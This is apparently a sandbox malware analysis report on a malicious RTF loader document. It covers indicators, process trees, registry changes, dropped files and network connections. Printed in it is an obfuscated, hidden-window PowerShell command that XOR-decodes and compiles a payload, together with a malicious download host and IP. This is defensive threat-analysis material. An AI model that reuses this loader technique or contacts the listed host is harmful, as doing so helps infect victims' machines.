File name: 583524278.doc
Full analysis: https://app.any.run/tasks/54ae0bb1-c906-4846-8c73-751944957b43
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 18, 2019, 04:36:34
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5: D71ECE9B762E3CDFF2ACD8CC058EA40C
SHA1: 631A487320531DE0E0BB59D91DCCC7305FB5C782
SHA256: 5967CECCA69A0DCC326F4606F40AED778E489CA086EDBB7A3514C4291AC8AA5B
SSDEEP: 3072:oHMAYDodWAYDodWAYDodWAYDodWAYDodHtxS:1AQdAQdAQdAQdAQaS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Scans artifacts that could help determine the target

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 252)
    • Application was dropped or rewritten from another process

      • l9137e5.exe (PID: 4396)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 5260)
  • SUSPICIOUS

    • Reads Environment values

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
    • Executed via COM

      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • excelcnv.exe (PID: 3372)
      • OpenWith.exe (PID: 2424)
    • Executed via WMI

      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • powershell.exe (PID: 5692)
    • PowerShell script executed

      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • powershell.exe (PID: 5692)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 252)
      • cvtres.exe (PID: 5252)
      • powershell.exe (PID: 716)
      • csc.exe (PID: 5772)
      • cvtres.exe (PID: 6096)
      • powershell.exe (PID: 4172)
      • cvtres.exe (PID: 2632)
      • csc.exe (PID: 1640)
      • cvtres.exe (PID: 1972)
      • powershell.exe (PID: 644)
      • l9137e5.exe (PID: 4396)
      • csc.exe (PID: 2636)
      • powershell.exe (PID: 5692)
      • cvtres.exe (PID: 3768)
      • csc.exe (PID: 5800)
      • csc.exe (PID: 2076)
    • Creates files in the user directory

      • powershell.exe (PID: 252)
      • cmd.exe (PID: 3160)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 252)
      • csc.exe (PID: 2636)
    • Starts CMD.EXE for commands execution

      • l9137e5.exe (PID: 4396)
    • Reads Microsoft Outlook installation path

      • WINWORD.EXE (PID: 5260)
    • Starts Internet Explorer

      • OpenWith.exe (PID: 2424)
    • Checks supported languages

      • OpenWith.exe (PID: 2424)
  • INFO

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • EXCEL.EXE (PID: 2816)
      • powershell.exe (PID: 716)
      • EXCEL.EXE (PID: 1292)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • EXCEL.EXE (PID: 1712)
      • powershell.exe (PID: 5692)
      • EXCEL.EXE (PID: 5720)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Reads the software policy settings

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • EXCEL.EXE (PID: 2816)
      • powershell.exe (PID: 4172)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • powershell.exe (PID: 644)
      • EXCEL.EXE (PID: 5720)
      • powershell.exe (PID: 5692)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 5260)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • IEXPLORE.EXE (PID: 888)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • excelcnv.exe (PID: 3372)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 252)
      • IEXPLORE.EXE (PID: 2524)
    • Changes internet zones settings

      • IEXPLORE.EXE (PID: 2524)
    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 888)
      • IEXPLORE.EXE (PID: 4524)
Find more information about signature artifacts and mapping to the MITRE ATT&CK™ MATRIX in the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
All screenshots are available in the full report
Total processes
133
Monitored processes
38
Malicious processes
2
Suspicious processes
11

Behavior graph

The interactive behavior graph is not reproduced here. Processes shown in the graph (legend: start, drop and start, no specs): winword.exe, excel.exe, powershell.exe, conhost.exe, csc.exe, cvtres.exe, l9137e5.exe, cmd.exe, excelcnv.exe, splwow64.exe, openwith.exe, iexplore.exe.

Process information

PID: 5260
CMD: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\583524278.doc" /o ""
Path: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 16.0.11328.20158

PID: 2128
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 0
Version: 16.0.11328.20158

PID: 252
CMD: powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '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'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb();
Path: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.16299.15 (WinBuild.160101.0800)

PID: 2388
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\WINDOWS\system32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.16299.15 (WinBuild.160101.0800)

PID: 2816
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 0
Version: 16.0.11328.20158

PID: 5772
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\dvg2liwx.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 4.7.2556.0 built by: NET471REL1

PID: 5252
CMD: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6DC8.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBA8AD52C1C3B4B7DB3827D7A78FC789.TMP"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 12.00.52519.0 built by: VSWINSERVICING

PID: 716
CMD: powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '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'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb();
Path: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.16299.15 (WinBuild.160101.0800)

PID: 1856
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\WINDOWS\system32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.16299.15 (WinBuild.160101.0800)

PID: 1292
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 0
Version: 16.0.11328.20158
Total events
14 518
Read events
13 587
Write events
783
Delete events
148

Modification events

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 0
Value: 017012000000001000BE4E402C04000000000000000400000000000000

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-US
Value: 2

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-US
Value: 1

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-GB
Value: 1

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation: write
Name: x+,
Value: 782B2C008C14000001000000000000004DD0AC6E223DD50100000000

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation: write
Name: (+,
Value: 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

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

Process: WINWORD.EXE (PID 5260)
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0
Executable files
2
Suspicious files
21
Text files
58
Unknown types
17

Dropped files

PID | Process | Filename | Type
2128 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm |
  MD5:
  SHA256:
2128 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal |
  MD5:
  SHA256:
5772 | csc.exe | C:\Users\admin\AppData\Local\Temp\dvg2liwx.dll |
  MD5:
  SHA256:
5772 | csc.exe | C:\Users\admin\AppData\Local\Temp\dvg2liwx.out |
  MD5:
  SHA256:
2816 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm |
  MD5:
  SHA256:
2816 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal |
  MD5:
  SHA256:
252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pxu3g2ea.sop.psm1 | text
  MD5: 0534487230078B72C814AF5A11B1EFB2
  SHA256: 2660653218476CA55D7268F9748C79319E6648CC86B64BD12011A25426EE50C6
5260 | WINWORD.EXE | C:\Users\admin\Desktop\~$3524278.doc | pgc
  MD5: C5D10E073C831FD01E2CABC5D1CC8B4C
  SHA256: F65DA600216B4B33DAC476A9370B6BEFC7FB735EB32A4C3619216501CF2A1343
252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_41sieqag.frw.ps1 | text
  MD5: 0534487230078B72C814AF5A11B1EFB2
  SHA256: 2660653218476CA55D7268F9748C79319E6648CC86B64BD12011A25426EE50C6
5260 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: 3B91E6AFCAECC942CA436D263BF64D1A
  SHA256: 3BED7D22623C5F6638DC19618831B499A5FDB36CCEB7CA2C68DEB65237E84E41
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
47
TCP/UDP connections
46
DNS requests
17
Threats
0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4524 | IEXPLORE.EXE | GET | 302 | 2.19.38.59:443 | https://go.microsoft.com/fwlink/?LinkId=517287 | | unknown | | whitelisted
4524 | IEXPLORE.EXE | GET | 302 | 2.19.38.59:443 | https://go.microsoft.com/fwlink/?LinkId=838604 | | unknown | | whitelisted
2128 | EXCEL.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 54 b | whitelisted
5260 | WINWORD.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 81 b | whitelisted
1292 | EXCEL.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 56 b | whitelisted
1292 | EXCEL.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 52 b | whitelisted
2128 | EXCEL.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 52 b | whitelisted
2816 | EXCEL.EXE | POST | 200 | 52.114.75.78:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | NL | text | 9 b | whitelisted
4524 | IEXPLORE.EXE | GET | 200 | 2.21.38.54:443 | https://www.microsoft.com/en-gb/welcomeie11/ | FR | html | 45.3 Kb | whitelisted
2128 | EXCEL.EXE | GET | 200 | 13.107.3.128:443 | https://config.edge.skype.com/config/v1/Office/16.0.11328.20158?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.11328.20158&MsoVersion=16.0.11328.20156&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b35D77AF2-E12E-4AD8-A5D0-1A468F88DD9B%7d&LabMachine=false | US | text | 60.3 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
5260 | WINWORD.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted
2128 | EXCEL.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted
4524 | IEXPLORE.EXE | 2.19.38.59:443 | go.microsoft.com | Akamai International B.V. | | whitelisted
5720 | EXCEL.EXE | 52.114.128.43:443 | self.events.data.microsoft.com | Microsoft Corporation | US | unknown
1712 | EXCEL.EXE | 52.114.128.43:443 | self.events.data.microsoft.com | Microsoft Corporation | US | unknown
252 | powershell.exe | 107.172.13.106:443 | binaterynaaik.com | ColoCrossing | US | unknown
5260 | WINWORD.EXE | 52.114.75.78:443 | self.events.data.microsoft.com | Microsoft Corporation | NL | unknown
1292 | EXCEL.EXE | 52.114.75.78:443 | self.events.data.microsoft.com | Microsoft Corporation | NL | unknown
2128 | EXCEL.EXE | 52.114.75.78:443 | self.events.data.microsoft.com | Microsoft Corporation | NL | unknown
2816 | EXCEL.EXE | 52.114.75.78:443 | self.events.data.microsoft.com | Microsoft Corporation | NL | unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
self.events.data.microsoft.com
  • 52.114.75.78
  • 52.114.128.43
whitelisted
binaterynaaik.com
  • 107.172.13.106
unknown
go.microsoft.com
  • 2.19.38.59
whitelisted
www.microsoft.com
  • 2.21.38.54
whitelisted
ajax.aspnetcdn.com
  • 152.199.19.160
whitelisted
statics-uhf-wus.akamaized.net
  • 2.16.186.32
  • 2.16.186.11
whitelisted
c.s-microsoft.com
  • 2.18.233.62
whitelisted
mem.gfx.ms
  • 104.109.56.54
whitelisted
img-prod-cms-rt-microsoft-com.akamaized.net
  • 2.16.186.27
  • 2.16.186.40
whitelisted

Threats

No threats detected
Debug output strings

Process | Message
EXCEL.EXE | 2019-07-18 04:37:09.479 T#3600 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE | 2019-07-18 04:37:20.589 T#6088 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE | 2019-07-18 04:37:30.854 T#4824 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE | 2019-07-18 04:37:40.729 T#1064 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE | 2019-07-18 04:37:49.917 T#3484 <E> [AriaSDK.PAL] PAL is already shutdown!